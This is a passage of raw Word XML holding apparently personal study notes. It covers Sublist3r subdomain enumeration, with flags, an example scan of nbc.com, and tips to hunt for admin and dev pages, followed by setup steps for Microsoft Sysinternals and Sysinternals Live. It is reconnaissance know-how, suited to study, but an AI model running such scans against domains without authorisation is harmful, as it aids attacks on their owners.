          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidR="006109FD" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/aboul3la/Sublist3r</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DA98BDA" w14:textId="1A06D74E" w:rsidR="007A7E90" w:rsidRPr="0084205E" w:rsidRDefault="007A7E90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/opt/Sublist3r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E7A18" w14:textId="5150E35E" w:rsidR="007A7E90" w:rsidRPr="0084205E" w:rsidRDefault="007A7E90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudo python3 sublist3r.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C735BB" w14:textId="137F6595" w:rsidR="006109FD" w:rsidRPr="0084205E" w:rsidRDefault="008F0C57" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Switchboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1968B35D" w14:textId="79A6F3D9" w:rsidR="008F0C57" w:rsidRPr="0084205E" w:rsidRDefault="007649C4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-d – set target domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E5BE53" w14:textId="1A5741E6" w:rsidR="007649C4" w:rsidRPr="0084205E" w:rsidRDefault="007649C4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-e – sets engine used for search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2087CC9A" w14:textId="7421384F" w:rsidR="007649C4" w:rsidRPr="0084205E" w:rsidRDefault="007649C4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-o – save output to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A2EC1" w14:textId="4FBC6F4D" w:rsidR="007649C4" w:rsidRPr="0084205E" w:rsidRDefault="007649C4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-t – designate use and number of threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06BE3C" w14:textId="4E24DAB5" w:rsidR="007649C4" w:rsidRPr="0084205E" w:rsidRDefault="007649C4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">-b – enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bruteforcing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> of domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7316F" w14:textId="4BA001DB" w:rsidR="007649C4" w:rsidRPr="0084205E" w:rsidRDefault="007649C4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. python3 sublist3r.py -d nbc.com -o sub-output-nbc.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54741AAE" w14:textId="3931F521" w:rsidR="007649C4" w:rsidRPr="0084205E" w:rsidRDefault="004B7D2B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C95CA5B" w14:textId="79605FA3" w:rsidR="004B7D2B" w:rsidRPr="0084205E" w:rsidRDefault="004B7D2B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>look for admin pages, email domains, domains under development (dev-www), help desk portals, single sign on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0141FBCF" w14:textId="652E7DE3" w:rsidR="004B7D2B" w:rsidRPr="0084205E" w:rsidRDefault="004B7D2B" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A36DB7C" w14:textId="1BFC63B3" w:rsidR="004B7D2B" w:rsidRPr="0084205E" w:rsidRDefault="00AA2D84" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SysInternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C899A20" w14:textId="2B25E041" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00AA2D84" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Suite of 70 different Windows-based Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6718D5CF" w14:textId="1D2D6F98" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00AA2D84" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File and Disk Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731EECB6" w14:textId="2DB19DEA" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00AA2D84" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Networking Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1203E623" w14:textId="74B8A342" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00AA2D84" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C19E7" w14:textId="65ED98DF" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00AA2D84" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Security Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670E949A" w14:textId="270AD18D" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00AA2D84" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>System Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515DB06" w14:textId="05D7500E" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00AA2D84" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Miscellaneous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3026D7C4" w14:textId="0A47AB8F" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00AA2D84" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sysinternals Utilities Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8D31A9" w14:textId="0E3FE1CE" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidR="00AA2D84" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/sysinternals/downloads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79DA6849" w14:textId="6207E659" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00AA2D84" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5121798C" w14:textId="0AAB70BE" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidR="00AA2D84" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://live.sysinternals.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25F04413" w14:textId="10232C79" w:rsidR="00AA2D84" w:rsidRPr="0084205E" w:rsidRDefault="00F84BBC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Download and extract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306DDEC5" w14:textId="6DB29540" w:rsidR="00F84BBC" w:rsidRPr="0084205E" w:rsidRDefault="00F84BBC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>add the folder path to environment variables to launch tools via CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7714AF75" w14:textId="4B2C16E4" w:rsidR="00F84BBC" w:rsidRPr="0084205E" w:rsidRDefault="00F84BBC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Environment Variables can be edited from System Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7576FC25" w14:textId="75D25045" w:rsidR="00F84BBC" w:rsidRPr="0084205E" w:rsidRDefault="00F84BBC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">CLI &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sysdm.cpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="014DA609" w14:textId="2C899802" w:rsidR="00F84BBC" w:rsidRPr="0084205E" w:rsidRDefault="00F84BBC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">click on Advanced &gt; Environment Variables &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00796A65" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">System Variables &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>Path (Edit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8A484F" w14:textId="1DF19B16" w:rsidR="00F84BBC" w:rsidRPr="0084205E" w:rsidRDefault="00F84BBC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">New </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;Folder Path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D76E9C" w14:textId="0EBBF659" w:rsidR="00F84BBC" w:rsidRPr="0084205E" w:rsidRDefault="00F84BBC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE67212" w14:textId="616EFF4F" w:rsidR="00F84BBC" w:rsidRPr="0084205E" w:rsidRDefault="00F84BBC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Download-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SysInternalsTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> C:\Tools\Sysint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A2F69" w14:textId="597E6D73" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00F84BBC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Using Sysinternals Live</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6239B881" w14:textId="4C5CCA40" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Need </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68DE6BF5" w14:textId="3B49E051" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C2F59AC" w14:textId="71244C6A" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Install-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WindowsFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> WebDAV-Redirector -Restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18947D4A" w14:textId="4351B851" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>verify after reboot of server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3118E4ED" w14:textId="102B4444" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WindowsFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> WebDAV-Redirector | Format-Table -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Autosize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DB9F005" w14:textId="64340786" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">get-service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B119671" w14:textId="664392BF" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">start-service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4961846D" w14:textId="02B2A7EB" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">get-service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AE087B0" w14:textId="56FC0414" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Network and Sharing Center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D355B7E" w14:textId="346BCA9A" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
